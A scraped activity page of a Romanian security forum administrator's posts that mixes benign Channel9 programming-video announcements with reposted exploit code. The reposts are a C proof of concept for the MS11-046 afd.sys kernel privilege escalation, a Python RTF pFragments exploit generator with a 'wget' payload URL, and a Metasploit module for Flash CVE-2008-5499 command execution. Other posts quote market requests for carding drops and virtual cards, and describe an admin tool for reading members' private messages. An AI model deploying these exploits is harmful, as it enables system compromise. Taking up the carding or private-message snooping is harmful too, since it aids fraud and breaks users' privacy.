Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18715

  • Joined

  • Last visited

  • Days Won

    701

 Content Type 

Everything posted by Nytro

  1. Nytro
    Scuze, acces: - 3871 = Nytro - 989 = Zatarra - 21017 = pyth0n3 - 13607 = begood - 15061 = MrRip - 1 = []kw3rln - 528 = Nemessis - 1348 = Ahead - 22232 = wildchild - 22968 = tex De asemenea, nu se pot vedea (asa ar trebui) mesajele private ale celor cu acces. Daca mai doreste cineva acces, sa ma contacteze. Daca e vreo problema, sau daca vreti ceva in plus, spuneti.
  2. Nytro
    [h=1]MS11-046 Afd.sys Proof of Concept[/h] /* MS11-046 Was a Zero day found in the wild , reported to MS by Steven Adair from the Shadowserver Foundation and Chris S . Ronnie Johndas wrote the writeup dissecting a malware with this exploit . I Rahul Sasi(fb1h2s) just made the POC exploit available . Reference: ms8-66, ms6-49 ************************************************************* Too lazy to add the shellcode , you could steel this one, it should work . http://www.whitecell.org/list.php?id=50 The shell code to acheive privilage esclation as per the article used the following steps http://www.exploit-db.com/wp-content/themes/exploit/docs/18712.pdf . 1) Use PslookupProcessId get system token 2) Replace it with the current process token, and we are system ************************************************************* */ #define SystemModuleInformation 11 #ifndef WIN32_LEAN_AND_MEAN #define WIN32_LEAN_AND_MEAN #endif #ifndef _WIN32_WINNT //For XP Only #define _WIN32_WINNT 0x0501 #endif // We have a client sock conencting to 135 considering the fact it's open by default #define DEFAULT_ADDR "127.0.0.1" #define DEFAULT_PORT "135" #include <windows.h> #include <winsock2.h> #include <ws2tcpip.h> #include <stdio.h> #include <iphlpapi.h> #include <stdio.h> #pragma comment(lib, "Ws2_32.lib") #pragma comment (lib, "ntdll.lib") //lets make a nop ret sandwitch unsigned char hexcode[]="\x90\x90\x90\xcc\x90\x90\x90\x90"; /* The shell code to acheive privilage esclation Add you shellcode here as per the article http://www.exploit-db.com/wp-content/themes/exploit/docs/18712.pdf the malware used the following method. 1) Wse PslookupProcessId get system token 2) Replace it with the current process token, and we are system */ // he gets the above sandwitch LPVOID hexcode_addr = (LPVOID)0x00000000; DWORD sizeofshell = 0x1000; // he gets the haldispatch ULONG_PTR HalDispatchTable; //Holds the base adress of krnl PVOID krl_base; //load adress of those %krnl%.exe dudes HMODULE krl_addr; // structure system_module_info data typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Reserved[2]; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT Unknown; USHORT LoadCount; USHORT ModuleNameOffset; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; //sock addrinfo struct addrinfo *result = NULL, *ptr = NULL, hints; // The list of loaded drivers typedef LONG NTSTATUS, *PNTSTATUS; NTSTATUS NTAPI ZwQuerySystemInformation( IN ULONG SystemInformationClass, IN PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength); typedef enum _KPROFILE_SOURCE { ProfileTime, ProfileAlignmentFixup, ProfileTotalIssues, ProfilePipelineDry, ProfileLoadInstructions, ProfilePipelineFrozen, ProfileBranchInstructions, ProfileTotalNonissues, ProfileDcacheMisses, ProfileIcacheMisses, ProfileCacheMisses, ProfileBranchMispredictions, ProfileStoreInstructions, ProfileFpInstructions, ProfileIntegerInstructions, Profile2Issue, Profile3Issue, Profile4Issue, ProfileSpecialInstructions, ProfileTotalCycles, ProfileIcacheIssues, ProfileDcacheAccesses, ProfileMemoryBarrierCycles, ProfileLoadLinkedIssues, ProfileMaximum } KPROFILE_SOURCE, *PKPROFILE_SOURCE; typedef DWORD (WINAPI *PNTQUERYINTERVAL)( KPROFILE_SOURCE ProfileSource,PULONG Interval ); typedef NTSTATUS (WINAPI *PNTALLOCATE)( IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN ULONG ZeroBits, IN OUT PULONG RegionSize, IN ULONG AllocationType, IN ULONG Protect ); int main() { //All the declarations goes here PNTQUERYINTERVAL ZwQueryIntervalProfile; PNTALLOCATE ZwAllocateVirtualMemory; KPROFILE_SOURCE stProfile = ProfileTotalIssues; ULONG Ret_size; NTSTATUS status,alloc_status ; ULONG i, n, *q; PSYSTEM_MODULE_INFORMATION p; void *base; WSADATA wsaData; SOCKET ConnectSocket = INVALID_SOCKET; int iResult; DWORD ibuf [0x30]; DWORD obuf [0x30]; ULONG_PTR result; hints.ai_family = AF_UNSPEC; hints.ai_socktype = SOCK_STREAM; hints.ai_protocol = IPPROTO_TCP; printf("\n [+] MS11-046 Exploit by fb1h2s(Rahul Sasi) "); /* MS11-046 Was a Zero day found in the wild , reported to MS by Steven Adair from the Shadowserver Foundation and Chris S . Ronnie Johndas wrote the writeup dissecting a malware with the exploit details . I Rahul Sasi(fb1h2s) just made the POC exploit available . Reference: ms8_66, ms6_49 http://www.whitecell.org/list.php?id=50 exp codes */ status = ZwQuerySystemInformation(SystemModuleInformation, &n, 0, &n); q = (ULONG *)malloc(n * sizeof(*q)); if (q == NULL) { perror("malloc"); return -1; } status = ZwQuerySystemInformation(SystemModuleInformation, q, n * sizeof(*q), NULL); p = (PSYSTEM_MODULE_INFORMATION)(q + 1); base = NULL; // Loop Loop The table and check for our krl for (i = 0; i < *q; i++) { if( strstr(p[i].ImageName,"ntkrnlpa.exe") ) { printf("\n [+] Yo Yo found, and am In ntkrnlpa.exe \n"); krl_addr = LoadLibraryExA("ntkrnlpa.exe",0,1); printf("\t Base: 0x%x size: %u\t%s\n", p[i].Base, p[i].Size, p[i].ImageName); krl_base = p[i].Base; break; } else if(strstr(p[i].ImageName,"ntoskrnl.exe")) { printf("\n [+] Yo Yo found, and am In ntoskrnl.exe\n"); krl_addr = LoadLibraryExA("ntoskrnl.exe",0,1); printf("\t Base Adress: 0x%x ",p[i].Base); krl_base = p[i].Base; break; } else { printf("\n [+]Cdnt find, and am out\n"); exit(0); } } free(q); printf("\n[+] Continue with Exploitation\n"); HalDispatchTable = (ULONG_PTR)GetProcAddress(krl_addr, "HalDispatchTable"); if( !HalDispatchTable ) { printf("[!!] Sh*t happen with HalDispatchTablen"); return FALSE; } printf("\tBase Nt=: 0x%x ",krl_base); HalDispatchTable -= ( ULONG_PTR )krl_addr; HalDispatchTable += krl_base; printf("\n[+] HalDispatchTable found \t\t\t [ 0x%p ]\n",HalDispatchTable); printf("[+] ZwQueryIntervalProfile "); ZwQueryIntervalProfile = ( PNTQUERYINTERVAL ) GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwQueryIntervalProfile"); if( !ZwQueryIntervalProfile ) { printf("[!!] Sh*t happen resolving ZwQueryIntervalProfile\n"); return FALSE; } printf( "\t\t\t [ 0x%p ]\n",ZwQueryIntervalProfile ); printf("[+] ZwAllocateVirtualMemory"); ZwAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle( "ntdll.dll"), "ZwAllocateVirtualMemory"); if( !ZwAllocateVirtualMemory ) { printf("[!!] Unable to resolve ZwAllocateVirtualMemory\n"); return FALSE; } printf( "\t\t\t [ 0x%p ]\n",ZwAllocateVirtualMemory ); printf("\n[+] Allocating memory at [ 0x%p ]...\n",hexcode_addr); alloc_status = ZwAllocateVirtualMemory( INVALID_HANDLE_VALUE, &hexcode_addr, 0, &sizeofshell, MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ); printf("\n[+] status %p.\n",alloc_status ); if( alloc_status != 0 ) { printf("[-] Sh*t happen with NtAllocateVirtualMemory() , %#X\n", alloc_status); } printf("\t\tZwAllocateVirtualMemory() Allocated return Status, %#X\n", alloc_status); memset(hexcode_addr, 0x90, sizeofshell); memcpy( (void*)((BYTE*)hexcode_addr + 0x100),(void*)hexcode, sizeof(hexcode)); iResult = WSAStartup(MAKEWORD(2,2), &wsaData); if (iResult != 0) { printf("WASUP Failed: %d\n", iResult); return 1; } iResult = getaddrinfo(DEFAULT_ADDR, DEFAULT_PORT, &hints, &result); ptr=result; // SOCKET for connecting to localhost at 135 ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype, ptr->ai_protocol); if (ConnectSocket == INVALID_SOCKET) { printf("[-] This is bad , Socket Error : %ld\n", WSAGetLastError()); freeaddrinfo(result); WSACleanup(); return 1; } // Connect to server. iResult = connect( ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen); if (iResult == SOCKET_ERROR) { closesocket(ConnectSocket); ConnectSocket = INVALID_SOCKET; printf("[+]Unable to connect to server, modify code and add a server socket, and connect to it!\n"); WSACleanup(); return ; } else { printf("[+]Hola Connected to server !\n"); } memset(ibuf,0x90,sizeof(ibuf)); memset(obuf,0x90,sizeof(obuf)); DeviceIoControl((HANDLE)ConnectSocket, 0x12007, (LPVOID)ibuf,sizeof(ibuf), (LPVOID)obuf,0, &Ret_size, NULL); for( i = 0; i < sizeof( hints ) ; i++) { printf(" %02X ",(unsigned char)obuf[i]); } printf("\n\n[+] Overwriting HalDispatchTable with those bytes..."); DeviceIoControl((HANDLE)ConnectSocket, 0x12007, (LPVOID)ibuf,sizeof(ibuf), (LPVOID)HalDispatchTable,0, &Ret_size, NULL); printf("\n\n[+] This should work and break..."); ZwQueryIntervalProfile(stProfile,&result); } Sursa: MS11-046 Afd.sys Proof of Concept
  3. Nytro
    [h=1]Wireshark 'call_dissector()' NULL Pointer Dereference Denial Of Service[/h] Source: http://www.securityfocus.com/bid/52735/info Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL-pointer-dereference error. An attacker can exploit this issue to crash the application, resulting in a denial-of-service condition. The following Wireshark versions are vulnerable: 1.4.0 through 1.4.11 1.6.0 through 1.6.5 PoC: http://www.exploit-db.com/sploits/18758.pcap Sursa: Wireshark 'call_dissector()' NULL Pointer Dereference Denial Of Service
  4. Nytro
    [h=1]Office 2008 sp0 RTF Pfragments MAC exploit[/h] #RTF Pfragments exploit for MAC office 2008 #Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com #Advanced Hacking Trainings - http://training.aslitsecurity.com #Web - http://www.aslitsecurity.com/ #Blog - http://www.aslitsecurity.blogspot.com/ #Office 2007 for MC SP 0 #!/usr/bin/python myfile = ( "\x7b\x5c\x72\x74\x66\x31\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70\x7b" "\x5c\x73\x6e\x20\x70\x46\x72\x61\x67\x6d\x65\x6e\x74\x73\x7d\x7b" "\x5c\x73\x76\x20\x39\x3b\x32\x3b\x31\x31\x31\x31\x31\x31\x31\x31" "\x37\x35\x30\x30\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "f069837c" # call esp "\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" "\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" "\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x62\x61\x30\x30" "\x30\x30\x35\x30\x30\x30\x36\x36\x38\x31\x63\x61\x66\x66\x30\x66" "\x34\x32\x35\x32\x36\x61\x30\x32\x35\x38\x63\x64\x32\x65\x33\x63" "\x30\x35\x35\x61\x37\x34\x65\x66\x62\x38\x37\x30\x36\x39\x36\x65" "\x36\x37\x38\x62\x66\x61\x61\x66\x37\x35\x65\x61\x61\x66\x37\x35" "\x65\x37\x35\x37\x63\x33\x7d\x7d\x7d\x7d" ) sign = ( "\x70\x69\x6e\x67\x70\x69\x6e\x67" ) shellcode = "\xCC\xCC\xCC\xCC" shellcode += "http://www.site.com/payload.DMG" shellcode += "\x11\x3A\x65\x89\x11\x3A\x65\x89\x11\x3A\x65\x89" #("wget http://") shellcode += "wget " shellcode += "\x1A\x18\x19\x02" exploit = open("output.doc", mode="wb") exploit.write(myfile + sign + shellcode) print "Done" Sursa: Office 2008 sp0 RTF Pfragments MAC exploit
  5. Nytro
    [h=1]Adobe Flash Player ActionScript Launch Command Execution Vulnerability[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability', 'Description' => %q{ This module exploits a vulnerability in Adobe Flash Player for Linux, version 10.0.12.36 and 9.0.151.0 and prior. An input validation vulnerability allows command execution when the browser loads a SWF file which contains shell metacharacters in the arguments to the ActionScript launch method. The victim must have Adobe AIR installed for the exploit to work. This module was tested against version 10.0.12.36 (10r12_36). }, 'License' => MSF_LICENSE, 'Author' => [ '0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version ], 'References' => [ ['CVE', '2008-5499'], ['OSVDB', '50796'], ['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html'], ['URL', 'http://www.securityfocus.com/bid/32896/exploit'] ], 'DefaultOptions' => { 'HTTP::compression' => 'gzip', 'HTTP::chunked' => true }, 'Platform' => 'unix', # so unix cmd exec payloads are ok 'Arch' => ARCH_CMD, 'Targets' => [ [ 'Automatic', {}], ], 'DisclosureDate' => 'Dec 17 2008', 'DefaultTarget' => 0)) end def exploit path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5499.swf" ) fd = File.open( path, "rb" ) @swf = fd.read(fd.stat.size) fd.close super end def on_request_uri(cli, request) msg = "#{cli.peerhost.ljust(16)} #{self.shortname}" trigger = @swf trigger_file = rand_text_alpha(rand(6)+3) + ".swf" obj_id = rand_text_alpha(rand(6)+3) if request.uri.match(/\.swf/i) print_status("#{msg} Sending Exploit SWF") send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' }) return end if request.uri.match(/\.txt/i) send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' }) return end html = <<-EOS <html> <head> </head> <body> <center> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="#{obj_id}" width="1" height="1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab"> <param name="movie" value="#{get_resource}#{trigger_file}" /> <embed src="#{get_resource}#{trigger_file}" quality="high" width="1" height="1" name="#{obj_id}" align="middle" allowNetworking="all" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"> </embed> </object> </center> </body> </html> EOS print_status("#{msg} Sending HTML...") send_response(cli, html, { 'Content-Type' => 'text/html' }) end end Sursa: Adobe Flash Player ActionScript Launch Command Execution Vulnerability
  6. Nytro
    Bla bla bla. Vreau sa vad acea poza. Asta ca sa nu va dau ban la amandoi.
  7. Nytro
    Salut, Am facut o prima versiune a aplicatiei de citit mesajele private. Stiu ca arata ca pula, dar e oarecum functional, putin limitat momentan. Limitari: - arata ca dracu - codul nu e scris tocmai profesional - implicit, afiseaza doar ultimele 30 de mesaje private - nu are niciun fel de paginare - intoarce doar ultimele 100 (LIMIT) de rezultate (DESC) ale cautarilor - nu are protectii de CSRF (lene) si SQL Injection (sa nu fie probleme cu cautarile) - daca mesajul e trimis catre mai multe persoane, nu le afiseaza O sa mai lucrez la el, poate maine sau in curand, e 4:43 AM acum. Momentau au acces doar: - 3871 = Nytro - 989 = Zatarra - 21017 = pyth0n3 - 13607 = begood - 15061 = MrRip - 1 = []kw3rln Daca mai doreste cineva acces, sa ma contacteze. Sa imi spuneti de eventuale probleme. Link: https://rstcenter.com/linkeditat Bafta.
  8. Nytro
    JavaScript Deobfuscation A Manual Approach Sudeep Singh 4/15/2012 Table of Contents Preface .......................................................................................................................................................... 3 Reasons for JavaScript Obfuscation .............................................................................................................. 4 Javascript Minifiers vs Obfuscators ............................................................................................................... 4 Methods of JavaScript Obfuscation .............................................................................................................. 5 Basic JavaScript Obfuscation ......................................................................................................................... 6 Blackhole Exploit Kit .................................................................................................................................... 12 Breaking Point Obfuscated JS Challenge ..................................................................................................... 23 JS Obfuscation in MetaSploit Framework ................................................................................................... 34 Conclusion ................................................................................................................................................... 37 References .................................................................................................................................................. 37 Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/18746.pdf
  9. Nytro
    Bun, tinem la seed.
  10. Nytro
    https://www.secmaniac.com/blog/2012/04/12/disallowing-infosec-institute-to-leverage-set/
  11. Nytro

    RST Market

    Nytro replied to a topic in Anunturi importante

    Nu stiu ce ati scris mai sus, dar la RST market, neaprobate: dxbut Am nevoie de un drop (pers ce primeste un colet cu produse cardate).Discutam. ------------------------------------------------------------------------ napoletanii Cumpar Virtual Credit Card cu 50 usd pe el de preferat sa fie visa si sa pot primi plati pe el. Platesc LR estimativ: pentru un vcc cu balance de 50 usd platesc 68 usd Am incercat 2 siteuri din multitudinea de "culori" de pe google (neavand timp sa ma informez daca chiar sunt sigure site-urile) https://www.instantvirtualcreditcards.com am primit cartea instant dar cartile vin cu sume mici (intre 5/10 usd) Buy VCC(Virtual Credit Card) Paypal VCC | Facebook VCC | ebay VCC | Facebook Coupons |and Virtual Credit Card for Online Purchase e un site nou facut in ianuarie si l-am incercat , e in pending tranzactia de 2 zile;) drept urmare am ajuns la varianta asta
  12. Nytro
    Sfinte cacat, voi sunteti batuti in cap. Ba 2 dolari pe zi, ba 5 dolari pe saptamana... Ce cacat faceti cu "banii" astia? Angajati-va ca spalatori de parbrize, tiganusii aia castiga 25-30 de RON pe zi, adica 10 dolari pe zi, adica se pisa pe voi milogilor. Bani din click-uri? Altceva nu puteti face? Asta e tot ce va ofera materia cenusie, sa dati clickuri? Faceti in cacat niste proiecte, 2-3 gratis, apoi 2-3 mai ieftine, apoi ies bani, se aduna lucruri pe CV, va angajati si luati 1500 - 2000 RON ca prim salariu, adica mai mult de 2 dolari pe zi.
  13. Nytro
    [h=1]GoingNative 6: Walter Bright and Andrei Alexandrescu - D Programming Language[/h] Posted: Feb 21, 2012 at 4:21 PM By: Charles We're back! Sorry for the delay between episodes, but we were busy preparing and then putting on GoingNative 2012, a C++11 conference that you have hopefully heard about It was a blast! Such great speakers. Such great attendees. Huge thanks to all of you who made the journey to Redmond for two days, bringing with you so much IQ and C++ love. And to those who watched the show live online, thank you, too, of course! All sessions will always be available on-demand right here on C9. Watch at your leisure, but do watch/listen/learn! We were fortunate and honored to have Andrei Alexandrescu speaking and Walter Bright in attendance at GoingNative 2012. Walter and Andrei are the co-custodians of the D programming language. Walter invented D about 11 or 12 years ago. Andrei has been an unrelenting champion and contributor to D for a long time and is the author of the book The D Programming Language. When/why did Andrei get involved with D? We'll find out. We filmed a conversation with these two legends right after GoingNative 2012 ended. So, what is D? What makes it special? D is a modern native programming language (not really an evolution of C++ as the name might imply. C++11 is an evolution of C++... D is it's own thing. It's D.). D is imperative (with C-like syntax), statically-typed, object-oriented, dynamic-friendly (via static type inference), garbage collected (optional), shared-nothing by default (nice!), functional-friendly (you can write pure functions that are verifiably pure), polymorphic, generic, and COM-friendly, too. D is also a low-level systems programming language. D takes many powerful modern programming ideas and idioms and makes them easy to use while keeping things purely native. We love this! Too often we hear things like, "Well, if you go fully native then you loose productivity..." Whatever. D proves you can have your cake and eat it, too. Tune in. Meet Walter and Andrei (and D, if you're not familiar with it). Thanks for spending time with C9, Walter and Andrei! Keep pushing the native envelope. "I want 1,000,000 users", says Andrei. Go D! Download D D Forums (written in D) Modern COM Programming in D Table of Contents: [00:00] GoingNative(); //Welcome back! Sorry for the delay. GoingNative 2012. D. [02:22] Charles has a conversation with Andrei Alexandrescu and Walter Bright about the D programming language [56:52] ~GoingNative(); //Charles and Diego talk about D and then destruct. Download: http://ch9files.blob.core.windows.net/ch9/f260/d027378a-61c9-4fbc-8b22-9ffd0147f260/GoingNative6TheDLanguageAndreiWalter_2MB_ch9.wmv http://ch9files.blob.core.windows.net/ch9/f260/d027378a-61c9-4fbc-8b22-9ffd0147f260/GoingNative6TheDLanguageAndreiWalter_high_ch9.mp4 Online: http://channel9.msdn.com/Shows/C9-GoingNative/GoingNative-6-The-D-Episode-with-Walter-Bright-and-Andrei-Alexandrescu
  14. Nytro
    [h=1]GoingNative 5: Inside the Visual C++ IDE, Meet Raul Pérez[/h] Posted: Dec 28, 2011 at 10:21 AM By: Charles Happy Holidays to all of you out there who are in some sort of holiday state. If not, then happy holidays anyway from Diego, Charles, C9, and VC We don't cover software testing—the job discipline—often enough on C9. We aim to change that starting now. A friend of Diego's on the VC++ team, Raul Pérez, is a software developer from Puerto Rico who works in QA for the Visual C++ IDE team. He writes tests to make sure the very-front-end of the VC toolchain—the IDE and its design-time compiler infrastructure—works as expected. There's a lot going on when you type characters into the VC++ editor. What happens, exactly? Why? What types of things can make Intellisense fast? What types of things can hinder the performance of the IDE? How does all of this magic happen? There's a compiler involved in all of this. It's not the front-end compiler (cl), but it is a front-end compiler and it compiles your source into data that's stored in a local DB for design-time use by Intellisense, Go-To-Definition, Syntax Coloring, Reference Highlighting, Auto-Completion, etc... All of these things are part of the set of IDE features that make Visual C++ visual... So, meet Raul and learn a thing or two about how the IDE works under the covers and how the system has evolved over time. Table of Contents (click time code links to navigate player accordingly) [00:00] GoingNative();//Getting faster at show construction - still have some optimizations to make... [01:56] Charles interviews Raul about Raul and the VC++ design-time system (Intellisense, Go-to-Definition, Auto-complete, Syntax coloring, etc...) [37:20] ~GoingNative(); //We're really performant this time We really want to hear from you, so please tweet feedback to @C9GoingNative (follow us!) and send your requests, ideas, complaints, praises, hate mail, and love letters to C9GoingNative [at] hotmail [dot] com. We will read and respond to all messages! That's how we roll, brothers and sisters. And if you're a Facebook user, please join our C9::GoingNative Facebook group. Go native! Download: http://ch9files.blob.core.windows.net/ch9/cbd3/4b7b0d6f-d9a8-4b9d-af65-9fc10010cbd3/C9GoingNative5RaulFrontEndIDE_2MB_ch9.wmv http://ch9files.blob.core.windows.net/ch9/cbd3/4b7b0d6f-d9a8-4b9d-af65-9fc10010cbd3/C9GoingNative5RaulFrontEndIDE_high_ch9.mp4 Online: http://channel9.msdn.com/Shows/C9-GoingNative/GoingNative-5-Inside-the-Visual-C-ID-Meet-Raul-Prez
  15. Nytro
    [h=1]GoingNative 3: The C++/CX Episode with Marian Luparu[/h] Posted: Oct 26, 2011 at 10:24 AM By: Charles This is the C++/CX episode - everything you ever wanted to know, but were afraid to ask... C++/CX language design team member Marian Luparu sits in the hot seat to answer some questions (a few from the GoingNative community - thank you!), draw on the whiteboard and demo some code. It's all about C++/CX. Tune in. Table of Contents (click time code links to navigate player accordingly) [00:00] GoingNative(); //Welcome. Diego spreads the news. [06:05] Charles interviews Marian Luparu (Whiteboarding included) [43:04] Marian Luparudemos some C++/CX and C++ [58:37] ~GoingNative(); //Charles and Diego recap. Don't fear the hat. We really want to hear from you, so please tweet feedback to @C9GoingNative (follow us!) and send your requests, ideas, complaints, praises, hate mail, and love letters to C9GoingNative at hotmail com. We will read and respond to all messages! That's how we roll, brothers and sisters. If you are a Facebook user, then please join our C9::GoingNative Facebook group. Go native! Download: http://ch9files.blob.core.windows.net/ch9/7962/4d1ad71a-fee6-41ce-b152-9f86011f7962/GoingNative3_2MB_ch9.wmv http://ch9files.blob.core.windows.net/ch9/7962/4d1ad71a-fee6-41ce-b152-9f86011f7962/GoingNative3_high_ch9.mp4 Online: http://channel9.msdn.com/Shows/C9-GoingNative/GoingNative-3-The-CCX-Episode-with-Marian-Luparu
  16. Nytro
    [h=1]Introduction to Typed Assembly Language (TAL)[/h] Posted: May 11, 2011 at 9:33 AM By: Charles Typed Assembly Language (TAL) extends traditional untyped assembly languages with typing annotations, memory management primitives, and a sound set of typing rules. These typing rules guarantee the memory safety, control flow safety, and type safety of TAL programs. Moreover, the typing constructs are expressive enough to encode most source language programming features including records and structures, arrays, higher-order and polymorphic functions, exceptions, abstract data types, subtyping, and modules. Just as importantly, TAL is flexible enough to admit many low-level compiler optimizations. Consequently, TAL is an ideal target platform for type-directed compilers that want to produce verifiably safe code for use in secure mobile code applications or extensible operating system kernels. [Source] You've met Microsoft research scientist and operating system expert Chris Hawblitzel before. He's the architect and lead researcher of the Verve operating system research project from MSR. As you learned in that interview, typed assembly language and Hoare logic were employed to verify the absence of many kinds of errors in low-level code. Chris et al. use TAL and Hoare logic to achieve highly automated, static verification of the safety of Verve. We didn't spend much time on TAL during the Verve interview, so we decided to remedy that. Enter computer scientist and RiSE team member Juan Chen who did much of the TAL work for Verve. After you watch this video, you should read this paper to go much deeper. Tune in and get a sense of what TAL is, how type verification works for assembly code, benefits, trade-offs, and much more. Enjoy. Download: http://ch9files.blob.core.windows.net/ch9/6f8d/5edac2dc-adcc-4b2e-93b7-9ecc016c6f8d/MSRTypedAssemblyLanguage_2MB_ch9.wmv http://ch9files.blob.core.windows.net/ch9/6f8d/5edac2dc-adcc-4b2e-93b7-9ecc016c6f8d/MSRTypedAssemblyLanguage_high_ch9.mp4 Online: http://channel9.msdn.com/Shows/Going+Deep/Chris-Hawblitzel-and-Juan-Chen-Introduction-to-Typed-Assembly-Language-TAL
  17. Nytro
    [h=1].NET 4.5: David Kean and Mircea Trofin - Portable Libraries[/h] Posted: Sep 27, 2011 at 10:16 AM By: Charles The Portable Class Library project enables you to write and build managed assemblies that work on more than one .NET Framework platform. You can create classes that contain code you wish to share across many projects, such as shared business logic, and then reference those classes from different types of projects. Using the Portable Class Library project, you can build portable assemblies that work without modification on the .NET Framework, Silverlight, Windows Phone 7, or Xbox 360 platforms. Without the Portable Class Library project, you must target a single platform and then manually rework the class library for other platforms. The Portable Class Library project supports a subset of assemblies from these platforms, and provides a Visual Studio template that makes it possible to build assemblies that run without modification on these platforms. [source = MSDN] The portable libraries project ships as part of Visual Studio 11 Developer Preview. You can build portable .NET class libraries by simply creating a Portable Class Library project (template provided for you) and choosing the platform targets. The IDE will then create the appropriate reference assemblies for you and you can then program as you normally would. Here, we meet Portable Libraries project developer David Kean and program manager Mircea Trofin to learn more. Whiteboarding included. Download: http://ch9files.blob.core.windows.net/ch9/028f/b006b5c5-f3c7-4a37-9747-9f670184028f/NET45VS11InsidePortableLibraries_2MB_ch9.wmv http://ch9files.blob.core.windows.net/ch9/028f/b006b5c5-f3c7-4a37-9747-9f670184028f/NET45VS11InsidePortableLibraries_high_ch9.mp4 Online: http://channel9.msdn.com/Shows/Going+Deep/NET-45-David-Kean-and-Marcea-Trofin-Portable-Libraries
  18. Nytro
    [h=1]Herb Sutter, Andrei Alexandrescu and Scott Meyers - C++11[/h] Posted: Oct 04, 2011 at 9:25 AM By: Charles I was able to attend C++ and Beyond 2011 and it was a tremendous experience. The technical depth and C++ goodness was profound and lasted for 3 whole days (and two evenings). Thanks Andrei Alexandrescu, Scott Meyers and Herb Sutter for allowing me to crash your affair with my camera - which was perhaps too big and too advanced for the likes of me - still, I was abe to capture some great content like this panel on C++11 with Scott, Andrei and Herb. Great questions from attendees. Note that this is the first in a series of three panels from C++ and Beyond 2011 that will appear on C9 over the coming months. Make sure to check out all the C&B 2011 content we're lucky enough to have stored on C9 Enjoy! Learn! Table of contents (click on the time code link to move the player to that point in time...): [00:19] When should new C++11 features be adopted in production? [09:28] C++11 Memory Model [15:23] Which C++11 features remain broadly missing? [16:25] When can we expect full C++11 conformance from the major compilers? [19:45] -> Herb Sutter asks YOU a question (please answer on this thread): What do you want the standards committee to work on next? Should they immediately start work on new features? Should they take a break before new feature work? [21:45] What about debugging, linking and tools - as it relates to C++11? [23:56] What really happened to Concepts? [29:07] Will existing code have to be changed just to compile with a new C++11 conforming compiler? [29:38] Why was a seemlingly complicated feature (to implement) like variadic templates rolled out sooner than a seemingly simple feature like templated typedefs? [32:42] What do you think we'll get wrong most often when using C++11 features? [45:13] Return by ref or by value - is there a universal rule of thumb? [48:32] Why don't lambdas have typedefs for argument types? [53:02] How do you capture enclosing scope variables when using lambdas? Download: http://ch9files.blob.core.windows.net/ch9/ecc8/aacddb61-f53f-4264-abb1-9f420166ecc8/CppBeyond11Cpp11Panel_2MB_ch9.wmv http://ch9files.blob.core.windows.net/ch9/ecc8/aacddb61-f53f-4264-abb1-9f420166ecc8/CppBeyond11Cpp11Panel_high_ch9.mp4 Online: http://channel9.msdn.com/Shows/Going+Deep/C-and-Beyond-2011-C11-Panel-Scott-Meyers-Andrei-Alexandrescu-and-Herb-Sutter
  19. Nytro
    [h=1]Drawbridge: A new form of virtualization for application sandboxing[/h] Posted: Oct 17, 2011 at 10:27 AM By: Charles Drawbridge is a research prototype of a new form of virtualization for application sandboxing. Drawbridge combines two core technologies: First, a picoprocess, which is a process-based isolation container with a minimal kernel API surface. Second, a library OS, which is a version of Windows enlightened to run efficiently within a picoprocess. Drawbridge combines two ideas from the literature, the picoprocess and the library OS, to provide a new form of computing, which retains the benefits of secure isolation, persistent compatibility, and execution continuity, but with drastically lower resource overheads. The Drawbridge library OS is an experimental Windows 7 library OS - a research project and proving ground for a larger concept: application virtualization and sandboxing. Drawbridge is capable of running the latest releases of major Windows applications such as Microsoft Excel, PowerPoint, and Internet Explorer with very little overhead compared to the traditional virtualization techniques. The experiment is going well! Now, what's going on here, exactly? Drawbridge research team members Galen Hunt, Reuben Olinsky and Jon Howell dig into some of the details, including project rationale and OS architecture, of research project Drawbridge. Paper: Rethinking the Library OS from the Top Down - Microsoft Research Download: http://ch9files.blob.core.windows.net/ch9/f427/abf131e6-cd47-4335-94d8-9e8d000bf427/MSRDrawbridgeAppVirtualizationResearch_2MB_ch9.wmv http://ch9files.blob.core.windows.net/ch9/f427/abf131e6-cd47-4335-94d8-9e8d000bf427/MSRDrawbridgeAppVirtualizationResearch_high_ch9.mp4 Online: http://channel9.msdn.com/Shows/Going+Deep/Drawbridge-An-Experimental-Library-Operating-System
  20. Nytro
